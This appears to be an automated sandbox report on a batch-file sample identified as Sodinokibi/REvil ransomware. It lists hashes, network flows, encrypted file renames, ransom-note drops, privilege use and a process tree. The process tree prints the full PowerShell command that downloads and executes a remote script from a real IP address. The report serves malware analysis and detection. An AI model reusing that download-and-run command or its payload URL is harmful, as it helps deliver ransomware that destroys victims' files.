Analysis
- max time kernel: 118s
- max time network: 127s
- platform: windows7_x64
- resource: win7v200722
- submitted: 24-08-2020 17:10
Static task: static1
Behavioral task: behavioral1
- Sample: 78db7807ce9e00993f72a5410cc869e8.bat
- Resource: win7v200722
Behavioral task: behavioral2
- Sample: 78db7807ce9e00993f72a5410cc869e8.bat
- Resource: win10
General
- Target: 78db7807ce9e00993f72a5410cc869e8.bat
- Size: 218B
- MD5: 289804e7e330a37b07416d754819db89
- SHA1: 8ed98b81615c3571fad40a840eae66f2de5fb035
- SHA256: d9632dbb498dcc5c817f3d28376b83ce717767e8f2eda31dca931a781785dc09
- SHA512: ac9649099ea34f88787d84761b3ea53acc436e847d91d2ac046d95cd176d8fe57a63b58ed726fae6f02507fe197e229ae664a4c903531642cd320ce1eeacce40
Malware Config
- Extracted: http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8
- Extracted: C:\754692-read-me.txt
  sodinokibi
Signatures
- Sodin,Sodinokibi,REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request 152 IoCs
  Processes: powershell.exe
  flow | pid | process
  Flows 3, 5, 7, 9, 11, 12, 14, 15, 18, 20, 22, 24, 25, 27, 28, 30, 31, 33, 35, 37, 39, 41, 43, 44, 46, 48, 49, 51, 52, 54, 55, 57, 59, 61, 63, 65, 66, 68, 70, 71, 73, 74, 76, 78, 80, 81, 83, 85, 86, 88, 90, 92, 93, 95, 96, 98, 100, 101, 103, 104, 107, 109, 111, 113 | 1424 | powershell.exe (every listed flow originates from the same process)
- Modifies extensions of user files 2 IoCs
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
  description | ioc | process
  File renamed | C:\Users\Admin\Pictures\GetUpdate.png => \??\c:\users\admin\pictures\GetUpdate.png.754692 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\HideEdit.png => \??\c:\users\admin\pictures\HideEdit.png.754692 | powershell.exe
- Enumerates connected drives 3 TTPs
- Drops file in System32 directory 1 IoCs
  Processes: powershell.exe
  description | ioc | process
  File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | powershell.exe
- Modifies service 2 TTPs 5 IoCs
  Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
- Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pg8439t9992y.bmp" | powershell.exe
- Drops file in Program Files directory 29 IoCs
  Processes: powershell.exe
  description | ioc | process
  File opened for modification | \??\c:\program files\UnlockRestart.otf | powershell.exe
  File opened for modification | \??\c:\program files\ReadConvertTo.DVR-MS | powershell.exe
  File opened for modification | \??\c:\program files\SearchStart.dxf | powershell.exe
  File opened for modification | \??\c:\program files\SplitProtect.mhtml | powershell.exe
  File opened for modification | \??\c:\program files\ShowCompress.wma | powershell.exe
  File created | \??\c:\program files\754692-read-me.txt | powershell.exe
  File opened for modification | \??\c:\program files\EditUnpublish.cfg | powershell.exe
  File opened for modification | \??\c:\program files\MoveUnpublish.dot | powershell.exe
  File opened for modification | \??\c:\program files\RegisterSelect.AAC | powershell.exe
  File opened for modification | \??\c:\program files\UnregisterPop.php | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\754692-read-me.txt | powershell.exe
  File created | \??\c:\program files (x86)\754692-read-me.txt | powershell.exe
  File opened for modification | \??\c:\program files\CheckpointPush.wax | powershell.exe
  File opened for modification | \??\c:\program files\DisconnectUndo.dotm | powershell.exe
  File opened for modification | \??\c:\program files\EditUnblock.tif | powershell.exe
  File opened for modification | \??\c:\program files\OutPublish.DVR | powershell.exe
  File opened for modification | \??\c:\program files\ShowGrant.mp4 | powershell.exe
  File opened for modification | \??\c:\program files\PopAssert.ini | powershell.exe
  File opened for modification | \??\c:\program files\UndoGrant.gif | powershell.exe
  File opened for modification | \??\c:\program files\ReadEnter.vbe | powershell.exe
  File opened for modification | \??\c:\program files\SkipProtect.ini | powershell.exe
  File opened for modification | \??\c:\program files\DenyInstall.easmx | powershell.exe
  File opened for modification | \??\c:\program files\DismountInitialize.wps | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\754692-read-me.txt | powershell.exe
  File opened for modification | \??\c:\program files\UnprotectRename.doc | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\754692-read-me.txt | powershell.exe
  File opened for modification | \??\c:\program files\ResolveInvoke.tiff | powershell.exe
  File opened for modification | \??\c:\program files\SuspendSubmit.mpeg | powershell.exe
  File opened for modification | \??\c:\program files\UnprotectFind.js | powershell.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  Processes: powershell.exe
  pid | process
  1424 | powershell.exe
- Suspicious behavior: EnumeratesProcesses 3 IoCs
  Processes: powershell.exe
  pid | process
  1424 | powershell.exe
  1424 | powershell.exe
  1424 | powershell.exe
- Suspicious use of AdjustPrivilegeToken 6 IoCs
  Processes: powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 1424 | powershell.exe
  Token: SeDebugPrivilege | 1424 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 1424 | powershell.exe
  Token: SeBackupPrivilege | 1852 | vssvc.exe
  Token: SeRestorePrivilege | 1852 | vssvc.exe
  Token: SeAuditPrivilege | 1852 | vssvc.exe
- Suspicious use of WriteProcessMemory 4 IoCs
  Processes: cmd.exe
  description | pid | process | target process
  PID 1060 wrote to memory of 1424 | 1060 | cmd.exe | powershell.exe
  PID 1060 wrote to memory of 1424 | 1060 | cmd.exe | powershell.exe
  PID 1060 wrote to memory of 1424 | 1060 | cmd.exe | powershell.exe
  PID 1060 wrote to memory of 1424 | 1060 | cmd.exe | powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\78db7807ce9e00993f72a5410cc869e8.bat"
  - Suspicious use of WriteProcessMemory
  PID: 1060
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of PID 1060)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8');Invoke-VHCXYJMKGXZ;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Drops file in System32 directory
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1424
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
  PID: 1852